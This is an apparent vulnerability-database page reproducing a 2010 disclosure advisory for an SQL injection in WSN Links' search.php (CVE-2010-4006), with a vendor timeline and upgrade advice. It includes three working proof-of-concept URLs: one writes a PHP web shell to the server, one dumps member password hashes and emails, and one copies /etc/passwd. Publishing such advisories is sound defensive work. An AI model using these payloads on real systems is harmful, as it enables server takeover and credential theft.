Vulners
Lucene search
WSN Links SQL Injection Vulnerability
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | WSN Links SQL Injection Vulnerability | 25 Nov 201000:00 | – | zdt |
 | CVE-2010-4006 | 3 Nov 201019:00 | – | cve |
 | CVE-2010-4006 | 3 Nov 201019:00 | – | cvelist |
 | WSN Links - SQL Injection | 24 Nov 201000:00 | – | exploitdb |
 | EUVD-2010-3982 | 7 Oct 202500:30 | – | euvd |
 | WSN Links - SQL Injection | 24 Nov 201000:00 | – | exploitpack |
 | WSN Links SQL injection vulnerability-vulnerability warning-the black bar safety net | 26 Nov 201000:00 | – | myhack58 |
 | CVE-2010-4006 | 3 Nov 201020:00 | – | nvd |
 | WSN Links SQL Injection | 2 Nov 201000:00 | – | packetstorm |
 | Sql injection | 3 Nov 201020:00 | – | prion |
10
'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)
Mark Stanislav - [email protected]
I. DESCRIPTION
---------------------------------------
A vulnerability exists in the search.php code that allows for SQL injection of various parameters. By assembling portions of SQL code between the affected parameters, successful SQL injection into the software can occur. In the testing done, various 'UNION SELECT' SQL injections can occur.
II. AFFECTED VERSIONS
---------------------------------------
< 6.0.1; < 5.1.51 ; < 5.0.81
III. TESTED VERSIONS
---------------------------------------
5.1.40 & 5.1.49
IV. PoC EXPLOITS
---------------------------------------
1) A 'UNION SELECT' which results in a PHP shell-execution script
http://example.com/search.php?namecondition=IS%20NULL))%20UNION%20((SELECT%20"<?php%20system($_REQUEST[cmd]);%20?>"%20INTO%20OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories
2) A 'UNION SELECT' which results in a member's name, password hash, and e-mail to be extracted to a file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILE&namesearch=/var/www/pass.txt&action=filter&filled=1&whichtype=categories
3) A 'UNION SELECT' which results in the /etc/passwd file being copied to a web directory file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=/var/www/passwd.txt&action=filter&filled=1&whichtype=categories
V. NOTES
---------------------------------------
* The above exploits require 'FILE' SQL privilege as well as poor web directory permissions to work.
* Only 'namecondition' and 'namesearch' are utilized for the actual SQL injection.
* There is potential to exploit this vulnerability which outputs user data directly to the browser.
* Passing 'debug=1' as a query value easily enables debug mode of tested 'WSN Links' deployments.
VI. SOLUTION
---------------------------------------
Upgrade to the most recent version of your 'WSN Links' code branch.
VII. REFERENCES
---------------------------------------
http://www.wsnlinks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006
http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/
VIII. TIMELINE
---------------------------------------
10/10/2010: Initial discloure e-mail to the vendor
10/18/2010: Follow-up via the vendor's contact web form
10/18/2010: Vendor acknowledgement/commitment to fix
10/21/2010: Patched versions released
10/31/2010: Public disclosure
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.01376